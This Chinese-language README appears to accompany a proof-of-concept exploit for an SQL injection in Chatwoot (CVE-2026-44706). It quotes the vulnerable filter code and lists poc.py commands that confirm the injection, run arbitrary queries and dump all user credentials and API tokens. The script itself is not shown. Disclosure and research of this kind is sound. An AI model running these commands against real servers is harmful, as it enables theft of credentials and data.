针对CVE-2026-44706的概念验证利用代码,这是Chatwoot的FilterService#lt_gt_filter_values中的一个SQL注入漏洞,允许任何经过身份验证的代理读取整个PostgreSQL数据库,包括用户凭据和API令牌。阅读完整文章在此。
用法:
# 验证注入(基于布尔)
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode check
# 基于时间的确认
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode timebased
# 提取任意SQL查询结果
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode extract --query "SELECT version()"
# 转储所有用户凭据和API令牌
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode creds
在app/services/filter_service.rb(第91行)中,用户输入直接插入到SQL中,没有参数化:
def lt_gt_filter_values(query_hash)
value = query_hash['values'][0] # ← 用户输入,未经清理
operator = query_hash['filter_operator'] == 'is_less_than' ? '<' : '>'
"#{operator} '#{value}'::#{attribute_data_type}" # ← 原始拼接
end
该类中的其他所有运算符都使用绑定参数(:value_N)。只有is_greater_than和is_less_than存在漏洞。
POST /api/v1/accounts/:id/conversations/filterPOST /api/v1/accounts/:id/contacts/filterCWE-89 SQL注入。任何经过身份验证的代理/管理员可以:
pg_sleep()耗尽数据库连接8.8 高 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
此工具仅用于教育和研究目的。仅在你拥有或获得明确测试许可的系统上使用。作者不对任何因使用该程序造成的误用或损害负责。
QuimeraX Intelligence是一个先进的EASM和网络威胁情报平台,专注于识别复杂系统中的关键漏洞。该平台主动监控、检测并向客户发出安全威胁警报,确保透明度和对潜在风险的快速响应。如果客户的系统被发现存在漏洞,他们会立即收到通知和全面报告,以便采取保护措施。了解更多
Hakai Security是一家由安全专业人士创立的网络安全公司,致力于追求技术卓越。我们提供定制化的安全解决方案,包括高级渗透测试、逼真的红队模拟以及安全开发实践,以主动保护客户的资产免受不断演变的网络威胁。
Hacking Club是一个培训平台,您可以通过我们安全咨询公司专家创建的实践课程、实验和挑战来学习网络安全:直接从战场到您的培训。通过hacking club练习本仓库中展示的漏洞!了解更多